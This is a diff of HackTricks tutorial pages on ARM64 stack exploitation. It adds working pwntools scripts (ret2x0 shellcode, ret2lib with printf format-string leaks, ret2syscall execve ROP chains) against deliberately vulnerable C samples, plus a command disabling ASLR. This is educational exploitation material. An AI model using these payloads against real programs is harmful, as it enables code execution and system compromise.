* 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||||
|
* arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -25,7 +25,7 @@ Therefore, it's possible to **fake all these structures** to make the dynamic li
|
||||||
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
|
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv.md) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
|
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
You can find a better explanation about this technique in the second half of the video:
|
You can find a better explanation about this technique in the second half of the video:
|
||||||
|
|
|
@ -92,7 +92,6 @@ target.sendline(payload)
|
||||||
|
|
||||||
# Drop to an interactive shell
|
# Drop to an interactive shell
|
||||||
target.interactive()
|
target.interactive()
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Ret2reg
|
## Ret2reg
|
||||||
|
@ -107,6 +106,93 @@ You can find some examples here: 
|
||||||
* [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
|
* [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
|
||||||
* **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`.
|
* **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
### Ret2sp
|
||||||
|
|
||||||
|
In ARM64 there **aren't** instructions allowing to **jump to the SP registry**. It might be possible to find a gadget that **moves sp to a registry and then jumps to that registry**, but in the libc of my kali I couldn't find any gadget like that:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
for i in `seq 1 30`; do
|
||||||
|
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
|
||||||
|
done
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless):
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1221).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Ret2reg
|
||||||
|
|
||||||
|
If a registry has an interesting address it's possible to jump to it just finding the adequate instruction. You could use something like:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
In ARM64, it's **`x0`** who stores the return value of a function, so it could be that x0 stores the address of a buffer controlled by the user with a shellcode to execute.
|
||||||
|
|
||||||
|
Example code:
|
||||||
|
|
||||||
|
```c
|
||||||
|
// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
void do_stuff(int do_arg){
|
||||||
|
if (do_arg == 1)
|
||||||
|
__asm__("br x0");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
char* vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
fgets(buffer, sizeof(buffer)*3, stdin);
|
||||||
|
return buffer;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char **argv) {
|
||||||
|
char* b = vulnerable_function();
|
||||||
|
do_stuff(2)
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1222).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1223).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('./ret2x0')
|
||||||
|
elf = context.binary = ELF('./ret2x0')
|
||||||
|
|
||||||
|
stack_offset = 72
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
br_x0 = p64(0x4006a0) # Addr of: br x0;
|
||||||
|
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0
|
||||||
|
|
||||||
|
p.sendline(payload)
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
If instead of `fgets` it was used something like **`read`**, it would have been possible to bypass PIE also by **only overwriting the last 2 bytes of the return address** to return to the `br x0;` instruction without needing to know the complete address.\
|
||||||
|
With `fgets` it doesn't work because it **adds a null (0x00) byte at the end**.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
|
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
|
||||||
|
|
|
@ -137,9 +137,21 @@ Check the example from:
|
||||||
[..](../)
|
[..](../)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## ARM64 Ret2lib Example
|
||||||
|
|
||||||
|
In the case of ARM64, the ret instruction jumps to whereber the x30 registry is pointing and not where the stack registry is pointing. So it's a bit more complicated.
|
||||||
|
|
||||||
|
Also in ARM64 an instruction does what the instruction does (it's not possible to jump in the middle of instructions and transform them in new ones).
|
||||||
|
|
||||||
|
Check the example from:
|
||||||
|
|
||||||
|
{% content-ref url="ret2lib-+-printf-leak-arm64.md" %}
|
||||||
|
[ret2lib-+-printf-leak-arm64.md](ret2lib-+-printf-leak-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Ret-into-printf (or puts)
|
## Ret-into-printf (or puts)
|
||||||
|
|
||||||
This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument.
|
This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument. For example putting the address of `puts` in the GOT into an execution of `puts` will **leak the address of `puts` in memory**.
|
||||||
|
|
||||||
## Ret2printf
|
## Ret2printf
|
||||||
|
|
||||||
|
|
|
@ -32,6 +32,10 @@ To the address indicated by One Gadget you need to **add the base address where
|
||||||
One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).
|
One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### ARM64
|
||||||
|
|
||||||
|
The github repo mentions that **ARM64 is supported** by the tool, but when running it in the libc of a Kali 2023.3 **it doesn't find any gadget**.
|
||||||
|
|
||||||
## Angry Gadget
|
## Angry Gadget
|
||||||
|
|
||||||
From the [**github repo**](https://github.com/ChrisTheCoolHut/angry\_gadget): Inspired by [OneGadget](https://github.com/david942j/one\_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\
|
From the [**github repo**](https://github.com/ChrisTheCoolHut/angry\_gadget): Inspired by [OneGadget](https://github.com/david942j/one\_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\
|
||||||
|
|
|
@ -0,0 +1,241 @@
|
||||||
|
# Ret2lib + Printf leak - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Ret2lib - NX bypass with ROP (no ASLR)
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
void bof()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nbof>\n");
|
||||||
|
fgets(buf, sizeof(buf)*3, stdin);
|
||||||
|
}
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printfleak();
|
||||||
|
bof();
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
|
||||||
|
# Disable aslr
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
### Find offset
|
||||||
|
|
||||||
|
### x30 offset
|
||||||
|
|
||||||
|
Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1215).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1216).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Find system and `/bin/sh` string
|
||||||
|
|
||||||
|
As the ASLR is disabled, the addresses are going to be always the same:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1219).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Find Gadgets
|
||||||
|
|
||||||
|
We need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
|
||||||
|
|
||||||
|
Using rooper an interesting gadget was found:
|
||||||
|
|
||||||
|
```
|
||||||
|
0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
|
||||||
|
```
|
||||||
|
|
||||||
|
This gadget will load `x0` from **`$sp + 0x18`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
p = process('./rop') # For local binary
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
libc.address = 0x0000fffff7df0000
|
||||||
|
binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||||
|
system = libc.sym["system"]
|
||||||
|
|
||||||
|
def expl_bof(payload):
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
# Ret2main
|
||||||
|
stack_offset = 108
|
||||||
|
ldr_x0_ret = p64(libc.address + 0x6bdf0) # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
|
||||||
|
|
||||||
|
x29 = b"AAAAAAAA"
|
||||||
|
x30 = p64(system)
|
||||||
|
fill = b"A" * (0x18 - 0x10)
|
||||||
|
x0 = p64(binsh)
|
||||||
|
|
||||||
|
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
## Ret2lib - NX, ASL & PIE bypass with printf leaks from the stack
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
void printfleak()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nPrintf>\n");
|
||||||
|
fgets(buf, sizeof(buf), stdin);
|
||||||
|
printf(buf);
|
||||||
|
}
|
||||||
|
|
||||||
|
void bof()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nbof>\n");
|
||||||
|
fgets(buf, sizeof(buf)*3, stdin);
|
||||||
|
}
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printfleak();
|
||||||
|
bof();
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile **without canary**:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o rop rop.c -fno-stack-protector -Wno-format-security
|
||||||
|
```
|
||||||
|
|
||||||
|
### PIE and ASLR but no canary
|
||||||
|
|
||||||
|
* Round 1:
|
||||||
|
* Leak of PIE from stack
|
||||||
|
* Abuse bof to go back to main
|
||||||
|
* Round 2:
|
||||||
|
* Leak of libc from the stack
|
||||||
|
* ROP: ret2system
|
||||||
|
|
||||||
|
### Printf leaks
|
||||||
|
|
||||||
|
Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1220).png" alt="" width="440"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
|
||||||
|
|
||||||
|
### x30 offset
|
||||||
|
|
||||||
|
See the previous example as the bof is the same.
|
||||||
|
|
||||||
|
### Find Gadgets
|
||||||
|
|
||||||
|
Like in the previous example, we need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
|
||||||
|
|
||||||
|
Using rooper another interesting gadget was found:
|
||||||
|
|
||||||
|
```
|
||||||
|
0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
|
||||||
|
```
|
||||||
|
|
||||||
|
This gadget will load `x0` from **`$sp + 0x78`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
p = process('./rop') # For local binary
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
|
||||||
|
def leak_printf(payload, is_main_addr=False):
|
||||||
|
p.sendlineafter(b">\n" ,payload)
|
||||||
|
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
|
||||||
|
if is_main_addr:
|
||||||
|
response = response[:-4] + b"0000"
|
||||||
|
return int(response, 16)
|
||||||
|
|
||||||
|
def expl_bof(payload):
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
# Get main address
|
||||||
|
main_address = leak_printf(b"%21$p", True)
|
||||||
|
print(f"Bin address: {hex(main_address)}")
|
||||||
|
|
||||||
|
# Ret2main
|
||||||
|
stack_offset = 108
|
||||||
|
main_call_printf_offset = 0x860 #Offset inside main to call printfleak
|
||||||
|
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
|
||||||
|
ret2main = b"A"*stack_offset + p64(main_address + main_call_printf_offset)
|
||||||
|
expl_bof(ret2main)
|
||||||
|
|
||||||
|
# libc
|
||||||
|
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
|
||||||
|
libc.address = libc_base_address
|
||||||
|
print(f"Libc address: {hex(libc_base_address)}")
|
||||||
|
binsh = next(libc.search(b"/bin/sh"))
|
||||||
|
system = libc.sym["system"]
|
||||||
|
|
||||||
|
# ret2system
|
||||||
|
ldr_x0_ret = p64(libc.address + 0x49c40) # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
|
||||||
|
|
||||||
|
x29 = b"AAAAAAAA"
|
||||||
|
x30 = p64(system)
|
||||||
|
fill = b"A" * (0x78 - 0x10)
|
||||||
|
x0 = p64(binsh)
|
||||||
|
|
||||||
|
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -28,7 +28,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
|
||||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode.md).
|
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Register gadgets
|
## Register gadgets
|
||||||
|
@ -123,8 +123,8 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||||
|
|
||||||
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
|
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
|
||||||
|
|
||||||
{% content-ref url="srop-sigreturn-oriented-programming.md" %}
|
{% content-ref url="../srop-sigreturn-oriented-programming.md" %}
|
||||||
[srop-sigreturn-oriented-programming.md](srop-sigreturn-oriented-programming.md)
|
[srop-sigreturn-oriented-programming.md](../srop-sigreturn-oriented-programming.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Exploit Example
|
## Exploit Example
|
|
@ -0,0 +1,151 @@
|
||||||
|
# Ret2syscall - ARM64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code
|
||||||
|
|
||||||
|
We are going to use the example from the page:
|
||||||
|
|
||||||
|
{% content-ref url="../../stack-overflow/ret2win/ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](../../stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector
|
||||||
|
```
|
||||||
|
|
||||||
|
## Gadgets
|
||||||
|
|
||||||
|
In order to prepare the call for the **syscall** it's needed the following configuration:
|
||||||
|
|
||||||
|
* `x8: 221 Specify sys_execve`
|
||||||
|
* `x0: ptr to "/bin/sh" specify file to execute`
|
||||||
|
* `x1: 0 specify no arguments passed`
|
||||||
|
* `x2: 0 specify no environment variables passed`
|
||||||
|
|
||||||
|
Using ROPgadget.py I was able to locate the following gadgets:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```armasm
|
||||||
|
;Load x0, x1 and x3 from stack and x5 and call x5
|
||||||
|
0x0000000000114c30:
|
||||||
|
ldp x3, x0, [sp, #8] ;
|
||||||
|
ldp x1, x4, [sp, #0x18] ;
|
||||||
|
ldr x5, [sp, #0x58] ;
|
||||||
|
ldr x2, [sp, #0xe0] ;
|
||||||
|
blr x5
|
||||||
|
|
||||||
|
;Move execve syscall (0xdd) to x8 and call it
|
||||||
|
0x00000000000bb97c :
|
||||||
|
nop ;
|
||||||
|
nop ;
|
||||||
|
mov x8, #0xdd ;
|
||||||
|
svc #0
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
With the previous gadgets we can control all the needed registers from the stack and use x5 to jump to the second gadget to call the syscall.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('./ret2syscall')
|
||||||
|
elf = context.binary = ELF('./ret2syscall')
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
libc.address = 0x0000fffff7df0000 # ASLR disabled
|
||||||
|
binsh = next(libc.search(b"/bin/sh"))
|
||||||
|
|
||||||
|
stack_offset = 72
|
||||||
|
|
||||||
|
#0x0000000000114c2c : bl #0x133070 ; ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
|
||||||
|
load_x0_x1_x2 = libc.address + 0x114c30 # ldp x3, x0, [sp, #8] ; ldp x1, x4, [sp, #0x18] ; ldr x5, [sp, #0x58] ; ldr x2, [sp, #0xe0] ; blr x5
|
||||||
|
|
||||||
|
# 0x00000000000bb97c : nop ; nop ; mov x8, #0xdd ; svc #0
|
||||||
|
call_execve = libc.address + 0xbb97c
|
||||||
|
|
||||||
|
print("/bin/sh in: " + hex(binsh))
|
||||||
|
print("load_x0_x1_x2 in: " + hex(load_x0_x1_x2))
|
||||||
|
print("call_execve in: " + hex(call_execve))
|
||||||
|
|
||||||
|
# stack offset
|
||||||
|
bof = b"A" * (stack_offset)
|
||||||
|
bof += p64(load_x0_x1_x2)
|
||||||
|
|
||||||
|
# ldp x3, x0, [sp, #8]
|
||||||
|
rop = b"BBBBBBBBBBBBBBBB" #x3
|
||||||
|
rop += p64(binsh) #x0
|
||||||
|
|
||||||
|
# ldp x1, x4, [sp, #0x18]
|
||||||
|
rop += b"C"*(0x18 - len(rop))
|
||||||
|
rop += p64(0x00) # x1
|
||||||
|
rop += b"CCCCCCCC" #x4
|
||||||
|
|
||||||
|
# ldr x5, [sp, #0x58]
|
||||||
|
rop += b"D"*(0x58 - len(rop))
|
||||||
|
rop += p64(call_execve) # x5
|
||||||
|
|
||||||
|
# ldr x2, [sp, #0xe0]
|
||||||
|
rop += b"E" * (0xe0 - len(rop))
|
||||||
|
rop += p64(0x00) # x2
|
||||||
|
|
||||||
|
payload = bof + rop
|
||||||
|
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
